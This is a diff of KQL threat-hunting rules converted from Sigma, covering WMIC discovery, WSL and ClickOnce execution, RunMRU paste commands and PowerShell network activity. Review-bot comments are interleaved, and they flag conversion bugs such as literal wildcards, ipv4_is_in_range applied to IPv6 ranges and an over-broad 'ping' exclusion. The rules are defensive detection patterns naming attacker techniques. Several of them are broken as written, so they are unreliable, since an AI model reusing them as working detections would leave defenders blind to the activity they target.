--- a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql
+++ b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql
@@ -1,14 +1,14 @@
-// Title: System Information Discovery Via Wmic.EXE
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-12-19
-// Level: low
-// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
-// including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,
-// and GPU driver products/versions.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082, detection.threat-hunting
-// False Positives:
-// - VMWare Tools serviceDiscovery scripts
-
-DeviceProcessEvents
+// Title: System Information Discovery Via Wmic.EXE
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-19
+// Level: low
+// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
+// including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,
+// and GPU driver products/versions.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082, detection.threat-hunting
+// False Positives:
+// - VMWare Tools serviceDiscovery scripts
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "caption" or ProcessCommandLine contains "command" or ProcessCommandLine contains "driverversion" or ProcessCommandLine contains "maxcapacity" or ProcessCommandLine contains "name" or ProcessCommandLine contains "osarchitecture" or ProcessCommandLine contains "product" or ProcessCommandLine contains "size" or ProcessCommandLine contains "smbiosbiosversion" or ProcessCommandLine contains "version" or ProcessCommandLine contains "videomodedescription") and (ProcessCommandLine contains "baseboard" or ProcessCommandLine contains "bios" or ProcessCommandLine contains "cpu" or ProcessCommandLine contains "diskdrive" or ProcessCommandLine contains "logicaldisk" or ProcessCommandLine contains "memphysical" or ProcessCommandLine contains "os" or ProcessCommandLine contains "path" or ProcessCommandLine contains "startup" or ProcessCommandLine contains "win32_videocontroller") and ProcessCommandLine contains "get" and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")) and (not(InitiatingProcessCommandLine contains "\\VMware\\VMware Tools\\serviceDiscovery\\scripts\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql
index a4b8858b..2bba25c8 100644
--- a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql
+++ b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql
@@ -1,13 +1,13 @@ -// Title: Arbitrary Command Execution Using WSL -// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-10-05 -// Level: medium -// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting -// False Positives: -// - Automation and orchestration scripts may use this method to execute scripts etc. -// - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) - -DeviceProcessEvents +// Title: Arbitrary Command Execution Using WSL +// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-05 +// Level: medium +// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting +// False Positives: +// - Automation and orchestration scripts may use this method to execute scripts etc. 
+// - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) + +DeviceProcessEvents | where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql index e6fb7135..a13e52d1 100644 --- a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql +++ b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql 
@@ -1,12 +1,12 @@ -// Title: Cab File Extraction Via Wusa.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-04 -// Level: medium -// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported. -// MITRE Tactic: Execution -// Tags: attack.execution, detection.threat-hunting -// False Positives: -// - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted) - -DeviceProcessEvents +// Title: Cab File Extraction Via Wusa.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-04 +// Level: medium +// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported. +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted) + +DeviceProcessEvents | where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql b/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql index 18fcca0b..b2007261 100644 --- a/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql +++ b/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql 
@@ -1,12 +1,12 @@ -// Title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-12 -// Level: medium -// Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting -// False Positives: -// - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production. - -DeviceProcessEvents +// Title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production. + +DeviceProcessEvents | where FolderPath endswith "\\AppData\\Local\\Apps\\2.0\\" and InitiatingProcessFolderPath endswith "\\dfsvc.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql index 99233110..24eb1cbb 100644 --- a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql +++ b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql 
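Review bot: The `FolderPath endswith "\\AppData\\Local\\Apps\\2.0\\"` test on the new `| where` line can never be true, because FolderPath in DeviceProcessEvents holds the full image path ending in the executable name (the sibling rules in this patch rely on exactly that with `FolderPath endswith "\\wusa.exe"`), so a path never ends in a backslash and the rule returns nothing. The ClickOnce cache directory sits in the middle of the path; the check should be `FolderPath contains "\\AppData\\Local\\Apps\\2.0\\"`. The conversion silently produced a dead rule, so a sample dfsvc child event is worth adding to whatever validation the new script performs.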
@@ -1,13 +1,13 @@ -// Title: Command Executed Via Run Dialog Box - Registry -// Author: Ahmed Farouk, Nasreddine Bencherchali -// Date: 2024-11-01 -// Level: low -// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. -// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. -// MITRE Tactic: Execution -// Tags: detection.threat-hunting, attack.execution -// False Positives: -// - Likely - -DeviceRegistryEvents +// Title: Command Executed Via Run Dialog Box - Registry +// Author: Ahmed Farouk, Nasreddine Bencherchali +// Date: 2024-11-01 +// Level: low +// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. +// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. +// MITRE Tactic: Execution +// Tags: detection.threat-hunting, attack.execution +// False Positives: +// - Likely + +DeviceRegistryEvents | where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (not(RegistryKey endswith "\\MRUList")) and (not(((RegistryValueData in~ ("%appdata%\\1", "%localappdata%\\1", "%public%\\1", "%temp%\\1", "calc\\1", "dxdiag\\1", "explorer\\1", "gpedit.msc\\1", "mmc\\1", "notepad\\1", "regedit\\1", "services.msc\\1", "winver\\1")) or RegistryValueData contains "ping"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql b/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql index 844268d6..ed3e79aa 100644 --- a/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql 
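Review bot: The exclusion `RegistryValueData contains "ping"` on the new `| where` line drops any Run-dialog entry with that substring anywhere in the value, so a pasted command of the CAPTCHA-lure kind the description mentions only needs a `ping` token somewhere in it to fall out of the results, and benign values such as "mapping" vanish too. Anchor it to the start of the value, `RegistryValueData startswith "ping"`, which still covers the interactive connectivity checks this clause appears intended for. Note also that every allow-listed value ends in the RunMRU `\\1` suffix while the `ping` clause does not, another sign it is broader than the rest of the filter.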
+++ b/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql @@ -1,12 +1,12 @@ -// Title: Dfsvc.EXE Network Connection To Non-Local IPs -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-12 -// Level: medium -// Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1203, detection.threat-hunting -// False Positives: -// - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary - -DeviceNetworkEvents +// Title: Dfsvc.EXE Network Connection To Non-Local IPs +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, detection.threat-hunting +// False Positives: +// - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\dfsvc.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql b/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql index 0d407fd5..6d851d21 100644 
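Review bot: The three IPv6 exclusions on the new `| where` line are passed to `ipv4_is_in_range`, which is documented to return null when an argument is not an IPv4 literal, so `::1/128`, `fe80::/10` and `fc00::/7` never match. Worse, for an IPv6 RemoteIP every term of the `or` is null, `not(null)` is null under Kusto's null logic, and `where` drops the row, so dfsvc connections over IPv6 are expected to be silently suppressed rather than reported. Use `ipv6_is_in_range(RemoteIP, "::1/128") or ipv6_is_in_range(RemoteIP, "fe80::/10") or ipv6_is_in_range(RemoteIP, "fc00::/7")` for those three terms (ipv6_is_in_range also accepts IPv4 notation, so the whole list could use it), or wrap the exclusion in `coalesce(..., false)` so a null can never hide a row.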
--- a/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql +++ b/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql @@ -1,12 +1,12 @@ -// Title: Import New Module Via PowerShell CommandLine -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-09 -// Level: low -// Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session -// MITRE Tactic: Execution -// Tags: attack.execution, detection.threat-hunting -// False Positives: -// - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes. - -DeviceProcessEvents +// Title: Import New Module Via PowerShell CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-09 +// Level: low +// Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes. + +DeviceProcessEvents | where ((ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not(((ProcessCommandLine contains ":\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "Tools\\Microsoft.VisualStudio.DevShell.dll") and (InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\cmd.exe")))) \ No newline at end of file 
diff --git a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql index 99d5a379..01966444 100644 --- a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql +++ b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql 
@@ -1,17 +1,17 @@ -// Title: Manual Execution of Script Inside of a Compressed File -// Author: @kostastsale -// Date: 2023-02-15 -// Level: medium -// Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. -// From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. -// 1. Compressed file opened using 7zip. -// 2. Compressed file opened using WinRar. -// 3. Compressed file opened using native windows File Explorer capabilities. -// When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter." -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, detection.threat-hunting -// False Positives: -// - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results. - -DeviceProcessEvents +// Title: Manual Execution of Script Inside of a Compressed File +// Author: @kostastsale +// Date: 2023-02-15 +// Level: medium +// Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. 
+// From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. +// 1. Compressed file opened using 7zip. +// 2. Compressed file opened using WinRar. +// 3. Compressed file opened using native windows File Explorer capabilities. +// When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter." +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.threat-hunting +// False Positives: +// - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results. 
+ +DeviceProcessEvents | where ((ProcessCommandLine =~ "*\\AppData\\local\\temp\\7z*\*" and InitiatingProcessFolderPath =~ "*\\7z*.exe") or ((ProcessCommandLine contains "\\AppData\\local\\temp*.rar\\" or ProcessCommandLine contains "\\AppData\\local\\temp*.zip\\") and InitiatingProcessFolderPath endswith "\\explorer.exe") or (ProcessCommandLine =~ "*\\AppData\\local\\temp\\rar*\*" and InitiatingProcessFolderPath endswith "\\winrar.exe")) and ((ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".js" or ProcessCommandLine endswith ".jse" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".wsf" or ProcessCommandLine endswith ".wsh") and (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql index d1b0df35..1d440713 100644 --- a/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql +++ b/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql 
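Review bot: The `*` wildcards from the Sigma rule survived the conversion as literal characters on the new `| where` line: `=~` is case-insensitive equality, not glob matching, so `ProcessCommandLine =~ "*\\AppData\\local\\temp\\7z*\*"` and `InitiatingProcessFolderPath =~ "*\\7z*.exe"` require the field to equal that exact string, and `contains "\\AppData\\local\\temp*.rar\\"` looks for a literal asterisk. All three archive-tool branches are therefore dead and the rule can never fire; the trailing `\*` is also not a standard KQL escape, so the literal may not even parse. Rewriting the three branches with `matches regex` on verbatim strings (below) restores the intended wildcard semantics; the script-extension and interpreter checks that follow are unchanged.
```kql
DeviceProcessEvents
| where (
        (ProcessCommandLine matches regex @"(?i)\\AppData\\local\\temp\\7z.*\\" and InitiatingProcessFolderPath matches regex @"(?i)\\7z[^\\]*\.exe$")
        or ((ProcessCommandLine matches regex @"(?i)\\AppData\\local\\temp.*\.rar\\" or ProcessCommandLine matches regex @"(?i)\\AppData\\local\\temp.*\.zip\\") and InitiatingProcessFolderPath endswith "\\explorer.exe")
        or (ProcessCommandLine matches regex @"(?i)\\AppData\\local\\temp\\rar.*\\" and InitiatingProcessFolderPath endswith "\\winrar.exe")
    )
    // … unchanged: script-extension and interpreter checks …
```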
@@ -1,12 +1,12 @@ -// Title: Microsoft Excel Add-In Loaded -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-12 -// Level: low -// Description: Detects Microsoft Excel loading an Add-In (.xll) file -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002, detection.threat-hunting -// False Positives: -// - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs - -DeviceImageLoadEvents +// Title: Microsoft Excel Add-In Loaded +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-12 +// Level: low +// Description: Detects Microsoft Excel loading an Add-In (.xll) file +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, detection.threat-hunting +// False Positives: +// - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs + +DeviceImageLoadEvents | where FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql index 024887eb..c9e3405a 100644 --- a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql +++ b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql 
@@ -1,12 +1,12 @@ -// Title: Microsoft Word Add-In Loaded -// Author: Steffen Rogge (dr0pd34d) -// Date: 2024-07-10 -// Level: low -// Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002, detection.threat-hunting -// False Positives: -// - The rules is only looking for ".wll" loads. So some false positives are expected with legitimate and allowed WLLs. - -DeviceImageLoadEvents +// Title: Microsoft Word Add-In Loaded +// Author: Steffen Rogge (dr0pd34d) +// Date: 2024-07-10 +// Level: low +// Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, detection.threat-hunting +// False Positives: +// - The rules is only looking for ".wll" loads. So some false positives are expected with legitimate and allowed WLLs. + +DeviceImageLoadEvents | where FolderPath endswith ".wll" and InitiatingProcessFolderPath endswith "\\winword.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql index c7436eee..c043cfa7 100644 --- a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql +++ b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql 
@@ -1,16 +1,16 @@ -// Title: Network Connection Initiated By PowerShell Process -// Author: Florian Roth (Nextron Systems) -// Date: 2017-03-13 -// Level: low -// Description: Detects a network connection that was initiated from a PowerShell process. -// Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. -// Use this rule as a basis for hunting for anomalies. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.threat-hunting -// False Positives: -// - Administrative scripts -// - Microsoft IP range -// - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range') - -DeviceNetworkEvents +// Title: Network Connection Initiated By PowerShell Process +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-13 +// Level: low +// Description: Detects a network connection that was initiated from a PowerShell process. +// Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. +// Use this rule as a basis for hunting for anomalies. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.threat-hunting +// False Positives: +// - Administrative scripts +// - Microsoft IP range +// - Additional filters are required. Adjust to your environment (e.g. 
extend filters with company's ip range') + +DeviceNetworkEvents | where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (not((((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "51.103.210.0/23"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql index d9acc39b..90bda73f 100644 --- a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql +++ b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql 
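Review bot: The IPv6 ranges `::1/128`, `fe80::/10` and `fc00::/7` on the new `| where` line are evaluated with `ipv4_is_in_range`, which returns null for non-IPv4 input; under Kusto's null logic an IPv6 RemoteIP then makes the entire `not(...)` null and the row is dropped, so PowerShell connections over IPv6 are never surfaced at all — switch those three terms to `ipv6_is_in_range`. The SYSTEM check `InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI"` looks like a literal port of a Sigma `User` match on "NT AUTHORITY\SYSTEM", but in advanced hunting the domain lives in InitiatingProcessAccountDomain and the name field is just `system`, so this clause likely never matches and the private-range exclusion for SYSTEM is inert; `InitiatingProcessAccountDomain =~ "nt authority"` (or `InitiatingProcessAccountName =~ "system"`) is the equivalent. The two hard-coded Microsoft prefixes `20.184.0.0/13` and `51.103.210.0/23` are a small slice of Microsoft's space and will drift; the header's "Microsoft IP range" note should say explicitly that these are examples to be replaced with the environment's own allow-list.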
@@ -1,13 +1,13 @@ -// Title: Potential BOINC Software Execution (UC-Berkeley Signature) -// Author: Matt Anderson (Huntress) -// Date: 2024-07-23 -// Level: informational -// Description: Detects the use of software that is related to the University of California, Berkeley via metadata information. -// This indicates it may be related to BOINC software and can be used maliciously if unauthorized. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting -// False Positives: -// - This software can be used for legitimate purposes when installed intentionally. - -DeviceProcessEvents +// Title: Potential BOINC Software Execution (UC-Berkeley Signature) +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: informational +// Description: Detects the use of software that is related to the University of California, Berkeley via metadata information. +// This indicates it may be related to BOINC software and can be used maliciously if unauthorized. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting +// False Positives: +// - This software can be used for legitimate purposes when installed intentionally. + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "University of California, Berkeley" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql index 3e07858a..96fa9c98 100644 --- a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql +++ b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql 
@@ -1,15 +1,15 @@ -// Title: Potential File Override/Append Via SET Command -// Author: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan) -// Date: 2024-08-22 -// Level: low -// Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. -// Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. -// Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". -// The typical use case of the "set /p=" command is to prompt the user for input. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting -// False Positives: -// - Legitimate use of the SET with the "/p" flag for user prompting. command in administrative scripts or user-generated scripts. - -DeviceProcessEvents +// Title: Potential File Override/Append Via SET Command +// Author: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan) +// Date: 2024-08-22 +// Level: low +// Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. +// Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. +// Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". +// The typical use case of the "set /p=" command is to prompt the user for input. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Legitimate use of the SET with the "/p" flag for user prompting. command in administrative scripts or user-generated scripts. 
+ +DeviceProcessEvents | where (ProcessCommandLine contains "/c set /p=" or ProcessCommandLine contains "\"set /p=" or (ProcessCommandLine contains ">>" and ProcessCommandLine contains "set /p=")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql index 7c0ea58c..53be99b2 100644 --- a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql +++ b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql 
@@ -1,13 +1,13 @@ -// Title: Potentially Suspicious PowerShell Child Processes -// Author: Florian Roth (Nextron Systems), Tim Shelton -// Date: 2022-04-26 -// Level: medium -// Description: Detects potentially suspicious child processes spawned by PowerShell. -// Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.threat-hunting -// False Positives: -// - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts. - -DeviceProcessEvents +// Title: Potentially Suspicious PowerShell Child Processes +// Author: Florian Roth (Nextron Systems), Tim Shelton +// Date: 2022-04-26 +// Level: medium +// Description: Detects potentially suspicious child processes spawned by PowerShell. +// Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.threat-hunting +// False Positives: +// - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts. 
